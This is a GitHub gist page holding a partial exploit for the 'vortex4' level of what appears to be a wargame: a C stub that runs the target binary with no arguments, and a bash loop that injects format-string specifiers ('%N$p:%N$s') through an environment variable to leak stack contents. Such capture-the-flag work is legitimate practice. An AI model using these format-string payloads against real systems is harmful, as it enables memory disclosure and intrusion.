Skip to content

Instantly share code, notes, and snippets.

@packz
Created May 22, 2012 21:34
Show Gist options
  • Save packz/2771756 to your computer and use it in GitHub Desktop.
Save packz/2771756 to your computer and use it in GitHub Desktop.
vortex
#include<stdio.h>
int main() {
execl("/vortex/vortex4", NULL);
}
#!/bin/bash
# maybe you have to export the variabile in order to avoid
# the shell to change the order its order
for i in {001..100};
do
echo -n "$i = ";
SSH_AGENT_PID="%$i\$p:%$i\$s" ./exploit4;
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment